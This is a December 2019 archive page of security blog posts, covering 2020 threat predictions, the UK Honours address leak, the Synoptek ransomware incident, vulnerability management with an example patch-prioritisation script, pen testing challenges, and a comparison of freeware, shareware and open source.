Monthly Archives: December 2019

Security resolutions for 2020 to stay safe online!

As we are about to enter the new year, it’s customary to reflect on our experiences from the passing year and make resolutions for the new one. Most people make resolutions around good health, their life goals, etc. Here is a different angle to our routine resolutions list – security…

Get yourself cybersecure for 2020

With ever more tech in our lives, our data is vulnerable. Here are our six top tips to keep it safe in the new year

Technology is changing our lives for the better; yet it’s also exposing us to organised crime, online scammers and hackers – and whole industries built around monetising our personal data. But you don’t have to be resigned to cyber-victimhood. Give yourself, and your devices, a security update for 2020 and start fighting back.

Hackers don’t like a liar – especially if the fibs are about the questions sites ask you as a means of identification


Cyber Attacks are the Norm

By Babur Nawaz Khan, Product Marketing, A10 Networks

As we leave 2019, it’s time to have a look at the year 2020 and what it will have in store for enterprises.

Since we are in the business of securing our enterprise customers’ infrastructures, we keep a close eye on how the security and encryption landscape is changing so we can help our customers to stay one step ahead.

In 2019, ransomware made a comeback, mobile operators worldwide made aggressive strides in the transformation to 5G, and GDPR completed its first full year in force, with the industry seeing some of the largest fines ever levied for massive data breaches suffered by enterprises.

2020 will no doubt bring a mix of the familiar, like the continued rash of DDoS attacks on government entities and cloud and gaming services, and the new and emerging. Below are just a few of the trends we see coming next year.

Ransomware will increase globally through 2020
Ransomware attacks are gaining widespread popularity because they can now be launched even against smaller players. Even a small amount of data can be used to hold an entire organisation, city or even country for ransom. The trend of attacks levied against North American cities and city governments will only continue to grow.

We will see at least three new strains of ransomware types introduced:

  • Modular or multi-levelled/layered ransomware and malware attacks will become the norm as this evasion technique becomes more prevalent. Modular attacks use multiple trojans and viruses to start the attack before the actual malware or ransomware is eventually downloaded and launched.
  • 70% of all malware attacks will use encryption to evade security measures (encrypted malware attacks).

To no surprise, the cyber security skills gap will keep on widening. As a result, security teams will struggle to create fool-proof policies and to leverage the full potential of their security investments.

Slow Adoption of new Encryption Standards
Although TLS 1.3 was ratified by the Internet Engineering Task Force in August 2018, we won’t see widespread or mainstream adoption: less than 10% of websites worldwide will start using TLS 1.3. TLS 1.2 will remain relevant, and therefore the leading TLS version in use globally, since it has not been compromised yet, it supports PFS, and the industry is generally slow when it comes to adopting new standards. Conversely, elliptic-curve cryptography (ECC) ciphers will see more than 80% adoption as older ciphers, such as RSA ciphers, disappear.

Decryption: It’s not a Choice Any Longer
TLS decryption will become mainstream as more attacks leverage encryption for infection and data breaches. Since decryption remains a compute-intensive process, firewall performance degradation will remain higher than 50%, and most enterprises will continue to overpay for SSL decryption due to a lack of skills within their security teams. To mitigate firewall performance challenges and the shortage of skilled staff, enterprises will have to adopt dedicated decryption solutions as a more efficient option while next-generation firewalls (NGFWs) continue to polish their on-board decryption capabilities.

Cyber attacks are indeed the new normal. Each year brings new security threats, data breaches and operational challenges, ensuring that businesses, governments and consumers always have to be on their toes. 2020 won’t be any different, particularly with the transformation to 5G mobile networks and the dramatic rise in IoT adoption by both consumers and businesses. The potential for massive and widespread cyber threats expands exponentially.

Let’s hope that organisations, as well as security vendors, focus on better understanding the security needs of the industry, and invest in solutions and policies that would give them a better chance at defending against the ever-evolving cyber threat landscape.

Huawei says ‘survival is our first priority’ in 2020 as western boycott bites

Chairman Eric Xu warns that hit from US sanctions means telecoms firm must ‘go all out’ to maintain sales

The embattled Chinese telecommunications company Huawei says “survival” is its first priority after announcing sales were hit hard by a boycott from western countries.

Eric Xu, the company’s chairman, said estimated sales revenue would reach 850bn yuan for 2019 (US$121bn) - up roughly 18% from the previous year, but much lower than initially expected.


The United Kingdom Leaks Home Addresses of Prominent Brits

2020 seems to be getting off to an inauspicious start with the compromise of the home addresses of prominent UK citizens–many of them in lines of work that could make them targets for crime.

The UK Cabinet Office issued an apology after a data leak that involved the exact addresses (including house and apartment numbers) of more than 1,000 New Year Honours recipients. The information was posted online and visible to the public for about an hour.

January 1 is one of two days reserved for the announcement of new members of the UK’s honor system, which includes newly minted members of the Order of Chivalry as well as other distinctions. The other day for such announcements is April 21, Queen Elizabeth’s birthday.

The names and addresses of 1,097 honors recipients were published on the New Year Honours website Friday, December 27. Included on the list were recording artist Sir Elton John, former Director of Public Prosecutions Alison Saunders, and several other athletes, celebrities, and government officials.

While many of the addresses on the list were already publicly available, individuals on the list are concerned for their safety.

“It’s much more concerning for private citizens, like those who have been involved in policing or counter-terrorism or other such sensitive cases, to have their addresses published,” said former Tory leader Sir Iain Duncan Smith to the Sunday Times.

“For someone like myself in direct frontline services, it would be very worrying if those details could be shared,” said Women’s Aid regional manager Sonya McMullen, whose address was also leaked.

As reported by the BBC, in an interview on Radio 4, former head of the civil service Lord Kerslake “suggested ‘human error’ could be to blame for the leak and called on investigators to look at whether staff were given training on data regulation.”

While the incident was subsequently reported to the Information Commissioner’s Office (ICO), which has the power to levy fines when personally identifiable information is mishandled or breached, what exactly is the right punishment for a crime where a layer of security is lost–and changing residence is the only remedy?

Do the fines cover the cost of selling a home, and all the associated expenses of moving? It’s an unknowable problem set, but there is one thing we know for certain: This sort of leak is avoidable. A combination of training and preventative systems can help employees avoid such grave mistakes–systems and protocols that work even on the day after Boxing Day, when employees may not be in the best shape.

There is always another layer of protection and prevention to be had when it comes to cyber and the protection of our information, just like there is always another story about failures to protect it.

The post The United Kingdom Leaks Home Addresses of Prominent Brits appeared first on Adam Levin.

Managing cybersecurity in multimedia networks


The explosion of internet speeds across the globe has led to a rapid increase in high-end streaming technology, wireless sensor networks and wearable Internet of Things (IoT) devices. Multimedia networks generate huge amounts of data flowing through multiple devices in different locations while also raising important questions about data propriety, copyright and protection. Cybersecurity has become an important component of multimedia networks looking to tackle these issues.

The urgency is precipitated by the condition of organizations which operate in this sector. A survey of cybersecurity decision-makers at US media and entertainment firms by Forrester Consulting in September 2018 found that more than half of the surveyed firms had experienced three or more cyber attacks. In April 2015, a cyberattack on renowned French international TV broadcaster TV5 Monde took 12 channels belonging to the broadcaster off the air.

Considering multimedia networks deal with the dissemination of large amounts of content in video, audio, image and other formats, these networks are open to various types of threats which target three major features of these networks:

Confidentiality is an important feature of data in multimedia networks. Access to confidential data through illegal means or unauthorized channels constitutes a major threat.

The integrity of the data contained in multimedia networks is paramount. Alteration of this data through detected or undetected means represents a major breach.

The end-users of multimedia networks expect the data they seek to be available at all times. Any disruption to this service has both a reputational and a financial consequence.

The exact kinds of threats that multimedia networks face are varied but they definitely include:

Distributed Denial of Service (DDoS) attacks

Multimedia networks are large and distributed and transmit huge amounts of data. Attackers specifically target such networks with Distributed Denial of Service (DDoS) attacks as the repercussions are immediate.

Patching vulnerabilities

Multimedia networks consist of many devices distributed across different countries and continents. In such a large network it is not always possible to ensure that every device is up to date with the latest security updates, leaving the network exposed to known vulnerabilities.

Supply chain attacks

As alluded to in the last point, multimedia networks generally have large supply chains which may not always uphold the same standards of cybersecurity. Any malware in the supply chain may spread to the main network, putting it at risk.

Social engineering

Though awareness has increased, multimedia networks often find themselves operated by employees who do not take cybersecurity as seriously or do not understand the consequences of neglecting cybersecurity. Such employees are at high risk of social engineering attacks.

To protect against these threats, enterprises running multimedia networks can consider Seqrite’s Unified Threat Management (UTM) solution which is a complete security package of vital tools, including a UTM firewall and high-grade intrusion detection systems.

Key UTM features which keep networks safe from threats:

  • Firewall – Administrators can block traffic between internal and external networks based on compliance policies
  • Intrusion Prevention System (IPS) – Network traffic is scrutinized in real-time to forestall a broad range of DoS and DDoS attacks
  • Gateway Antivirus – Incoming and outgoing network traffic is scanned at the gateway level
  • Web Filtering – Non-business related web traffic can be blocked by administrators with the option of group-based bandwidth management

The post Managing cybersecurity in multimedia networks appeared first on Seqrite Blog.

Only Focused on Patching? You’re Not Doing Vulnerability Management

By Anthony Perridge, VP International, ThreatQuotient

When I speak to security professionals about vulnerability management, I find that there is still a lot of confusion in the market. Most people immediately think I’m referring to getting rid of the vulnerabilities in the hardware and software within their network, but vulnerability management encompasses a much broader scope.

Vulnerability management is not just vulnerability scanning, the technical task of scanning the network to get a full inventory of all software and hardware and precise versions and current vulnerabilities associated with each. Nor is it vulnerability assessment, a project with a defined start and end that includes vulnerability scanning and a report on vulnerabilities identified and recommendations for remediation. Vulnerability management is a holistic approach to vulnerabilities – an ongoing process to better manage your organisation’s vulnerabilities for the long run. This practice includes vulnerability assessment which, by definition, includes vulnerability scanning, but also other steps as described in the SANS white paper, Implementing a Vulnerability Management Process.

Just as the process of vulnerability management is broader than you might think, the definition of a vulnerability is as well. A vulnerability is the state of being exposed to the possibility of an attack. The technical vulnerabilities in your network are one component, but there is another important aspect that is often overlooked – the vulnerabilities specific to your company, industry and geography. You can’t only look internally at the state of your assets. You must also look externally at threat actors and the campaigns they are currently launching to get a more complete picture of your vulnerabilities and strengthen your security posture more effectively.

In The Art of War, Sun Tzu captured the value of this strategy well when he stated, “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Prioritise Patching Based on the Threat
As stated above, with respect to vulnerability management, most security organisations tend to focus on patching but because they don’t have the resources to patch everything quickly, they need to figure out what to patch first. To do this security teams typically take a thumbnail approach – they start with critical assets, the servers where their crown jewels are located, and work down to less critical assets. While a good starting point, their prioritisation decisions are based only on internal information. As Sun Tzu points out, knowing yourself but not the enemy will yield some victories but also defeats.

Having a platform that serves as a central repository allows you to aggregate internal threat and event data with external threat feeds and normalise that data so that it is in a usable format. By augmenting and enriching information from inside your environment with external threat intelligence about indicators, adversaries and their methods, you can map current attacks targeting your company, industry and geography to vulnerabilities in your assets. Intelligence about a campaign that presents an immediate and actual threat to your organisation leads to a more accurate assessment of priorities and may cause you to change your current patch plan to prioritise those systems that could be attacked at that moment. The result is intelligence-driven patch management that hardens your processes to thwart the attack.

Bridge the Visibility Gap
Unfortunately, the reality is that not every company has 100% visibility into their assets and vulnerabilities, so mapping external threat data to internal indicators to hone a patch plan sometimes has limited value. However, there is still tremendous value in gathering information from global threat feeds and other external intelligence sources to determine if your business is under a specific attack. The MITRE ATT&CK framework is one such source. It dives deep into adversaries and their methodologies so security analysts can use that information to their advantage.

Bringing MITRE ATT&CK data into your repository allows you to start from a higher vantage point with information on adversaries and associated tactics, techniques and procedures. You can take a proactive approach, beginning with your organisation’s risk profile, mapping those risks to specific adversaries and their tactics, drilling down to techniques those adversaries are using and then investigating if these techniques could be successful or if related data have been identified in the environment. For example, you may be concerned with APT28 and can quickly answer questions including: What techniques do they apply? Have I seen potential indicators of compromise or possible related system events in my organisation? Are my endpoint technologies detecting those techniques? With answers to questions like these you can discover real threats, determine specific actions to harden your network and processes, and mitigate risk to your business.
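The two workflows described above, intelligence-driven patch prioritisation and checking an adversary's techniques against your detection coverage, as an added example (not ThreatQuotient's code or platform). The asset inventory, CVE ids, the second adversary and the technique-to-adversary mapping are constructed; APT28 is the adversary named in the text and the technique ids are real ATT&CK ids.

```python
"""Intelligence-driven patch prioritisation and ATT&CK detection-gap check.

Added example. Everything below is constructed sample data: the assets,
the CVE ids (year 0000 marks them as placeholders), the second adversary,
and which CVEs/techniques each campaign uses. Only the technique ids
(T1566 Phishing, T1078 Valid Accounts, T1486 Data Encrypted for Impact)
are real ATT&CK identifiers.
"""
from dataclasses import dataclass


@dataclass
class Asset:
    name: str
    criticality: int       # 1 (low) .. 5 (crown jewels), from the internal view
    cves: set              # CVE ids reported by the vulnerability scan


@dataclass
class Campaign:
    adversary: str
    industries: set        # industries the campaign is observed targeting
    regions: set           # geographies the campaign is observed targeting
    exploited_cves: set    # vulnerabilities the campaign exploits
    techniques: set        # ATT&CK technique ids attributed to the adversary


# Constructed internal inventory: what a scan of our own environment reports.
ASSETS = [
    Asset("db-crown-jewels", 5, {"CVE-0000-1001"}),
    Asset("hr-portal", 3, {"CVE-0000-2002", "CVE-0000-2003"}),
    Asset("print-server", 1, {"CVE-0000-3004"}),
]

# Constructed external feed: who is attacking which sector, with what.
CAMPAIGNS = [
    Campaign("APT28", {"government"}, {"EU"}, {"CVE-0000-2003"},
             {"T1566", "T1078"}),
    Campaign("fictional-group-B", {"retail"}, {"US"}, {"CVE-0000-1001"},
             {"T1486"}),
]

# Our organisation's profile: the "know yourself" half of the picture.
ORG_PROFILE = {"industry": "government", "region": "EU"}

# Campaigns aimed at an industry/region we are not in are noise for this purpose.
def relevant_campaigns(campaigns, profile):
    return [c for c in campaigns
            if profile["industry"] in c.industries
            and profile["region"] in c.regions]


def prioritize_patches(assets, campaigns, profile):
    """Return (cve, asset, score) tuples, highest priority first.

    The internal-only score is just asset criticality (the usual
    crown-jewels-first plan). A CVE that a campaign aimed at our industry
    and region is actively exploiting gets a boost large enough to outrank
    criticality alone, which is how intelligence reshuffles the patch plan.
    """
    active = relevant_campaigns(campaigns, profile)
    exploited = {cve for c in active for cve in c.exploited_cves}
    rows = []
    for asset in assets:
        for cve in asset.cves:
            score = asset.criticality + (10 if cve in exploited else 0)
            rows.append((cve, asset.name, score))
    return sorted(rows, key=lambda r: (-r[2], r[0]))


def detection_gaps(adversary, campaigns, detected_techniques):
    """Techniques used by the named adversary that none of our tooling detects.

    Answers "are my endpoint technologies detecting those techniques?" for
    one adversary of concern, given the technique ids our controls cover.
    """
    used = set()
    for c in campaigns:
        if c.adversary == adversary:
            used |= c.techniques
    return sorted(used - set(detected_techniques))


if __name__ == "__main__":
    for cve, asset, score in prioritize_patches(ASSETS, CAMPAIGNS, ORG_PROFILE):
        print(f"{score:>3}  {cve}  on {asset}")
    # Constructed coverage: our EDR has a rule for phishing but not for
    # abuse of valid accounts, so T1078 comes back as the gap.
    print("APT28 gaps:", detection_gaps("APT28", CAMPAIGNS, {"T1566"}))
```

Without the feed, `db-crown-jewels` would be patched first; with it, the `hr-portal` CVE that a campaign against our sector is exploiting moves to the top.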

A holistic approach to vulnerability management, that includes knowing yourself and your enemy, allows you to go beyond patching. It provides awareness and intelligence to effectively and efficiently mitigate your organisation’s risk and position your team to address other high-value activities – like detecting, containing and remediating actual attacks, and even anticipating potential threats.

Happy 10th Birthday,

Today marks the 10th anniversary of! Over the past decade, the site has featured more than 1,800 stories focusing mainly on cybercrime, computer security and user privacy concerns. And what a decade it has been.

Stories here have exposed countless scams, data breaches, cybercrooks and corporate stumbles. In the ten years since its inception, the site has attracted more than 37,000 newsletter subscribers, and nearly 100 million pageviews generated by roughly 40 million unique visitors.

Some of those 40 million visitors left more than 100,000 comments. The community that has sprung up around KrebsOnSecurity has been truly humbling and a joy to watch, and I’m eternally grateful for all your contributions.

One housekeeping note: A good chunk of the loyal readers here are understandably security- and privacy-conscious, and many block advertisements by default — including the ads displayed here.

Just a reminder that KrebsOnSecurity does not run third-party ads and has no plans to change that; all of the creatives you see on this site are hosted in-house, are purely image-based, and are vetted first by Yours Truly. Love them or hate ’em, these ads help keep the content at KrebsOnSecurity free to any and all readers. If you’re currently blocking ads here, please consider making an exception for this site.

Last but certainly not least, thank you for your readership. I couldn’t have done this without your encouragement, wisdom, tips and support. Here’s wishing you all a happy, healthy and wealthy 2020, and for another decade of stories to come.

Weekly Update 171

Sitting down to do this one today I thought it would be brief, turns out a bit more ended up on the agenda than I expected. The GoGetSSL bit in particular was unfolding as I recorded and to their credit, they later apologised for their "rude messages" which is a good sign. I still intend to finish writing up the blog post because the issues they've raised need tackling, but as with the Sophos example I also talk about, it's good to see a bit of humility (I've certainly been there myself before). All that plus the Turkish Crime Family aftermath and the Factual data (another data aggregator) in HIBP in this week's update.

  1. Sophos got their messaging wrong on padlocks and HTTPS, but fixed it immediately once people spoke up (good on them for that effort!)
  2. GoGetSSL got their messaging wrong on SSL over and over and over and over... (more to follow on this, I'll put it in a dedicated blog post)
  3. "The Turkish Crime Family" ringleader plead guilty to blackmailing Apple (time and time again, this turns out to be kids full of bravado)
  4. Back in 2017 I wrote about how the Turkish Crime Family data was pretty suspect (basically all came from another data breach)
  5. Sponsored by Varonis, check out their free video course: 7 Hidden Office 365 Security Settings You Can Only Unlock with PowerShell

Ransomware at IT Services Provider Synoptek

Synoptek, a California business that provides cloud hosting and IT management services to more than a thousand customers nationwide, suffered a ransomware attack this week that has disrupted operations for many of its clients, according to sources. The company has reportedly paid a ransom demand in a bid to restore operations as quickly as possible.

Irvine, Calif.-based Synoptek is a managed service provider that maintains a variety of cloud-based services for more than 1,100 customers across a broad spectrum of industries, including state and local governments, financial services, healthcare, manufacturing, media, retail and software. The company has nearly a thousand employees and brought in more than $100 million in revenue in the past year, according to their Web site.

A now-deleted Tweet from Synoptek on Dec. 20 warned against the dangers of phishing-based cyberattacks, less than three days prior to their (apparently phishing-based) Sodinokibi ransomware infestation.

News of the incident first surfaced on Reddit, which lit up on Christmas Eve with posts from people working at companies affected by the outage. The only official statement about any kind of incident came late Friday evening from the company’s Twitter page, which said that on Dec. 23 it experienced a “credential compromise which has been contained,” and that Synoptek “took immediate action and have been working diligently with customers to remediate the situation.”

Synoptek has not yet responded to multiple requests for comment. But two sources who work at the company have now confirmed their employer was hit by Sodinokibi, a potent ransomware strain also known as “rEvil” that encrypts data and demands a cryptocurrency payment in return for a digital key that unlocks access to infected systems. Those sources also say the company paid their extortionists an unverified sum in exchange for decryption keys.

Sources also confirm that both the State of California and the U.S. Department of Homeland Security have been reaching out to state and local entities potentially affected by the attack. One Synoptek customer briefed on the attack who asked to remain anonymous said that once inside Synoptek’s systems, the intruders used a remote management tool to install the ransomware on client systems.

Much like other ransomware gangs operating today, the crooks behind Sodinokibi seem to focus on targeting IT providers. And it’s not hard to see why: With each passing day of an attack, customers affected by it vent their anger and frustration on social media, which places increased pressure on the provider to simply pay up.

A Sodinokibi attack earlier this month on Colorado-based IT services firm Complete Technology Solutions resulted in ransomware being installed on computers at more than 100 dentistry practices that relied on the company. In August, Wisconsin-based IT provider PerCSoft was hit by Sodinokibi, causing outages for more than 400 clients.

To put added pressure on victims to negotiate payment, the purveyors of Sodinokibi recently stated that they plan to publish data stolen from companies infected with their malware who elect to rebuild their operations instead of paying the ransom.

In addition, the group behind the Maze Ransomware malware strain recently began following through on a similar threat, erecting a site on the public Internet that lists victims by name and includes samples of sensitive documents stolen from victims who have opted not to pay. When the site was first set up on Dec. 14, it listed just eight victims; as of today, there are more than two dozen companies named.

Three Challenges of Pen Testing


There is no arguing that a penetration test can be an invaluable exercise to evaluate the security of an IT infrastructure. Despite the necessity for these critical evaluations, many security teams struggle to maximize the effectiveness of pen tests in their organization. What are the top challenges that organizations are looking at today when facing an upcoming pen test? Read on to find out.

1. The Importance of Scope and Clear Rules of Engagement

While conducting a pen test is an involved process, some of the most critical work comes before testing ever begins. The scoping stage can determine the success of the entire process. With so many different things to test, as well as a variety of ways to test them, it’s difficult to limit yourself. So many options, as well as differing perspectives on what are the highest priorities, can result in scope creep. It’s easy to end up with a wide scope that tries to cover a little bit of everything. But a scope that is too broad may not end up producing as much valuable information, since pen testers typically won’t be able to do an in depth evaluation. 

When developing your scope, it’s helpful to consider not just your devices, applications, and networks, but overarching goals and priorities that you want from your pen test. You can also talk with the pen testers to help establish reasonable, firm parameters that will still provide valuable insights.

Rules should also be set around the more specific details of executing a pen test. You’ll want to be clear on not just what you want, but what you don’t want. Do you want an internal or external test? Is it permissible to handle sensitive data? Do you want to inform employees the test is going on? You don’t want to set off alarms unless that’s the goal of the test—which should be established well ahead of the test taking place. On what date and at what time will this occur? Establishing clear rules of engagement ensures that testing goes smoothly, without network disruptions or misunderstandings.

2. Working Around Resource Constraints

Though limited resources are a problem in many areas, cybersecurity faces an especially severe shortage of skilled workers. One of the top challenges in cybersecurity today, let alone pen testing, is finding people with the necessary skill sets to face these ever-growing threats. In fact, according to the Center for Strategic and International Studies (CSIS), the number of unfilled cybersecurity jobs has grown by more than 50 percent since 2015. Since the cybersecurity skills shortage clearly can’t be solved overnight, what can be done?

One approach is to focus on making the limited number of skilled pen testers as productive as possible. This means ensuring that they are not wasting their time on mundane, repetitive tasks. Pen testing tools like Core Impact can automate these tasks, such as collecting information about networks or hosts. Additionally, one of the most time-consuming aspects of pen testing is creating the final report. Testers often have to gather all of the data and manually compile the results. Using a tool like Core Impact keeps track of a pen tester’s activities and can auto-generate reports, dramatically increasing efficiency.

Another approach, which can work well in tandem with the first, is to emphasize on-the-job training for new or junior pen testers. Even though they haven’t built up a robust skill set, they can still hit the ground running in several ways. Oftentimes, less experienced pen testers assist with more of the monotonous work to help free up the time of advanced pen testers. However, they can also help with more advanced tasks that improve their training. Pen testing tools, as mentioned earlier, can help speed up or automate some of the more tedious tasks. More complex work can be simplified through the use of GUI interfaces and wizards, so knowledge of the command line isn’t necessary. Core Impact, for example, has wizards for all of its Rapid Penetration Tests (RPTs) for network and web applications. By streamlining the tasks of both advanced and junior testers, along with the assistance of tools, pen testing teams can not only get through a resource drought, they can even learn how to do more with less.

Not only this, the cybersecurity specialists that do exist are in a constant race against time. The longer malware lingers in your environment, the more damage it will do. The longer a security weakness is left unremedied, the more likely an attacker will exploit it.

3. Intelligent Advancements Without Shared Knowledge

The world of pen testing can be an interesting balance of open collaboration and closely guarded privacy. While different groups may engage in teaming exercises, or happily talk technique when they attend Black Hat, most pen testers are extremely reluctant when it comes to publishing information online, particularly details of how they’ve been successful in getting around defenses.

One reason for this is that pen testing teams may not want their methods known. There is no magic formula for pen testing—each environment is different and requires a combination of skills, tools, and creative thinking. Pen testers and pen testing teams discover and develop unique techniques and methods that they may prefer to keep quiet so they can have effective means of carrying out their assigned tasks. The dominant reason for not publishing information is that it creates a security hazard that can affect anybody with an internet connection. While pen testers use the knowledge of how to evade barriers for the sake of improving security, there is no guarantee that whoever reads it is a pen tester and not a threat actor. These malicious parties would happily use this to get into a system and wreak havoc.

This leaves the challenge of how to stay up to date when pen testers can’t widely share information. Investing in enterprise pen testing tools like Core Impact can often provide a new knowledge base that is regularly updated with new tactics as well as exploits to take advantage of new vulnerabilities that have been published. Ultimately, it’s important to keep in mind that what works today, may not work tomorrow. Even if there were more outside sources, you would want to keep trying new techniques, innovating, and utilizing the latest resources in order to stay not just up to date, but hopefully one step ahead of attackers.

Ready to learn some new pen testing techniques?

Get expert advice on strategies to use throughout the process of creating a social engineering campaign by enrolling in our Best Practices for Effective Phishing Simulations eCourse.

Freeware vs. Shareware vs. Open Source – What is Each and How to Use Them Safely

During the last decade or so, software deployment for both SMBs and enterprises has become rather problematic – not so much on the upscaling part, but rather in the number of licenses an institution has to purchase and renew. The costs can be ginormous, which is the very reason company owners resort to cost-effective alternatives such as freeware, shareware, and open source. In this article, I’m going to run you through each category. After that, you can decide which is better for your business. Let’s get to it – freeware vs. shareware vs. open source. Who will win the race?

What is Freeware?

Loosely defined as a type of proprietary software that is distributed at no cost whatsoever to the user, freeware is the answer to accomplishing very simple tasks without the need to invest in expensive, license-based software. Freeware has no EULA, license, or rights of any kind, which means that it can be deployed on both home and enterprise machines.

Freeware is not a modern concoction. In fact, the term itself was coined in the golden 80s by Andrew Fluegelman, who sought a means of making PC-Talk (Skype’s long-forgotten ancestor) available outside regular distribution channels. The key differentiator between freeware, shareware, and open-source is that freeware does not make its source code available, despite being free of charge.

A couple of freeware examples: Discord (IM used by the gaming community), Yahoo Messenger (rest in peace, my friend), µTorrent, IrfanView, Groove Music, Winamp, DVD Shrink, CCleaner, and others.

Freeware pros:

  • Easy to use and deploy (for home users and enterprises\SMBs).
  • A great way to incentivize your potential customers (for soft makers and marketeers gunning for paid licenses).
  • Solve daily tasks without having to invest in expensive software.
  • Quickly grow your user base.

Freeware cons:

  • Limited functionality.
  • No way of reverse-engineering it since the source code is not made available.
  • Customers may sometimes perceive the product as inferior.


What is Shareware?

Probably most of the apps found online and offline fall under this category. Shareware is so widespread that it ‘felt’ the need to have its own consortium. Called the Association of Shareware Professionals, or ASP for short, this international trade organization comprises over 1,500 vendors, authors, and online retailers. The term was coined around the same time as freeware.

While Fluegelman was pushing his PC-Talk comm app, Jim “Button” Knopf, an IBM employee at that time, was releasing a database program called PC-File. In legal terms, the main difference between Knopf’s app and Fluegelman’s freebie is that the database program was never meant to be offered free of charge.

Knopf himself called his creation “user-supported software”, meaning that users would need to cover some of the fees associated with the continual development of the product. No doubt an interesting marketing practice, but a lucrative one, given shareware’s popularity and availability.

Shareware is an umbrella term, encompassing various types of apps, each following a unique business model.

Types of shareware

1. Adware

Also called “advertising-supported software”, this type of shareware has embedded ads running alongside the apps. The purpose of adware is to generate revenue for its creator. Ads may be present during the installation process or as part of the user interface. Most are ‘hardwired’ to analyze the users’ traffic in order to display customized ads. Adware is free-to-use, but the sheer number of ads can interfere with normal operation. A large number of apps currently available on Google Play are adware.

2. Crippleware

It may sound like a new form of malware, but it’s actually a legit type of software. Why is it called “crippleware”? Because the author purposely “cripples” the app’s vital functions, making them available only in the paid or premium version. For instance, in a photo-editing app, the save-as-JPEG function may be disabled, or the photos may carry watermarks that can only be removed by upgrading to the full version.

3. Trialware

Trialware apps can be used for a limited period. In most cases, users will be granted access to all of the app’s functions (including the ones available in the paid version). However, once the trial period expires, the app will be disabled or revert to a very basic (and barely usable) version. From my experience, trialware that doesn’t cover vital system processes (i.e. antivirus or malware scanners) will simply stop working. It will, of course, display a splash screen meant to inform the user that the software has expired and that he must upgrade to the full version.

4. Donationware

The software grants the user access to all of its features. However, it does come with one small request: the user is asked to shell out a small amount of cash to support the project or just show appreciation for the author’s work. The payout is optional and has no bearing on the app’s functionality. Given its behavior, one could consider that donationware has more in common with freeware than with shareware.

5. Nagware

Pejorative in nature, the term “nagware” describes a software category that reminds users via on-screen messages that their licenses are about to expire and that they should upgrade to the full version. In most cases, the nags will continue well after the trial period is over. The functionality will be reduced, the user having access only to basic functions.

6. Freemium

A portmanteau term (“free” + “premium”) describing a type of software that ‘withholds’ advanced features, making them available in the premium version. The free version is fully functional. Nags are rare, but users might receive ads from time to time regarding the advantages of the premium versions.

Shareware pros:

  • Free to use.
  • Powerful features. Great for getting a one-time task done.
  • Donationware is just as good as any license-based application.
  • Diversity and abundance.
  • Most of them are cross-platformers.

Shareware cons:

  • Some legal issues may arise if deployed on enterprise machines.
  • Poor compatibility with newer operating systems.
  • Ads and nags can become annoying.
  • Shareware doesn’t benefit from regular security and functionality updates as licensed software.

One last thing to mention – neither freeware nor shareware authors make the source code available for studying or altering. Which brings us to the third software category: open-source.

What is Open-Source?

Open-source software, or OSS, is software for which the author releases the source code. Furthermore, as far as copyright is concerned, whoever holds the software’s license can distribute, study, or alter the source code. Enterprises often turn to open-source solutions since they’re much easier to customize compared to licensed software.

The best example of OSS I can think of is VLC player, one of the most popular video players available online. That’s on the consumer side.

As for enterprises and SMBs, there are a number of open-source applications that have successfully replaced their license-based counterparts: OpenCart (online shopping platform), SuiteCRM (useful for managing customer info), Helpy (self-service support), Mailman (management tool for email lists), WordPress (blogging), Datawrapper (data visualization), GIMP (powerful image editor), LibreOffice (perfect and free alternative to Microsoft Office), and the list goes on.

Open-source software pros:

  • Free and cheaper compared to (paid) license-based products.
  • Moddable, reliable, and easy to use.
  • Safer from a cybersecurity standpoint compared to free and even some license-based products.
  • Very flexible. It can be used beyond its intended purpose (you’re going to need a talented backend hand for that).

Open-source software cons:

  • It can incur some long-term (and unforeseeable) costs. Any issues that arise have to be dealt with by yourself or your dev team. This usually happens when the software has been outstretched or altered more than necessary. Doing in-house patching and/or repair points to another con: no support for the product. So, if something goes wrong, you’re on your own.
  • Less-than-friendly UI. It will also take you a while to learn the product.


Freeware vs. Shareware

Now that we’ve got the basics in place, let’s take a closer look at the first contenders: freeware vs. shareware.

First of all, I think it’s important to see which audience the two of them address. We can agree (to disagree) that both types of software can be used on home and work machines alike. As someone who didn’t have a lot of money to spend on software, I can wholeheartedly say that freeware is what dreams are made of – imagine what it would have meant to buy a Photoshop license just to tweak some family photos or to pull a prank on your roommate.

Game streaming – for those of you familiar with the concept, the costs alone can make your head spin, that is if you want to go pro. Still, even the basics can cost a pretty penny. Luckily you can accomplish basic tasks like screen or voice recording with some very nice (and free) online tools.

Things change a bit when it comes to deploying freeware on enterprise machines. Of course, some shareware can handle some of the routine tasks. For instance, ePrompter is a great and hassle-free alternative to Microsoft Outlook or some other desktop-based email management tool. Even TeamViewer, the (over)glorified remote computer control tool is free and can be used to accomplish very simple tasks.

Other honorable mentions: Discord (great alternative to Teams, Skype for business, and even WhatsApp), B1 Free Archiver (if you really don’t want to buy WinRAR), Recuva (powerful data recovery application), CCleaner (registry cleaner), Foxit Reader (open and print pdf files), and Microsoft Visual Studio Express (supports multiple IDEs, pitch-perfect for web designers).

Indeed, they are very powerful tools, but, in my opinion, simply not enough to meet the needs of a bustling enterprise. It all boils down to statistics: the bigger the database, the likelier it is to find a solution (or more) to suit your needs.

Why shareware? There are literally thousands of apps, available both online and offline, some of them just as good, if not better than license-based software. One thing about shareware – it’s a short-term solution.

Basically, it’s your ‘emergency-only’ kit: problem – shareware – problem solved. This type of software wasn’t designed for long-term use. As I pointed out in the section about shareware, most have some kind of built-in ‘safety’ to prevent users from doing just that; except for donationware, of course. There’s also the matter of overexposing your machine(s) to malicious content. I will cover this in the last section of the article.

The main reason why shareware is better than freeware for enterprise needs – evergreen(ness). Most freeware is outdated, meaning that it may not even run properly on Windows 10 machines. If you add the fact that it is unpatched, you’ve got yourself a major cybersecurity vulnerability. Last, but not least, to my knowledge, few freeware titles support platforms other than Microsoft Windows. So, if you need to deploy freeware on a machine running Linux or macOS, you’re in for a world of pain.

Winner – shareware. Hassle-free, tons of content, suitable for any kind of need, be it home- or enterprise-related.

Shareware vs. open-source

Clearly, shareware is the better alternative to freeware, but how does it fare against open-source software? The latter category holds the high ground here. Why? Because, as the name suggests, the source code is made available, which means that a talented backend hand can easily customize it. But will it prove to be a match for shareware’s availability and ‘widespreadness’?

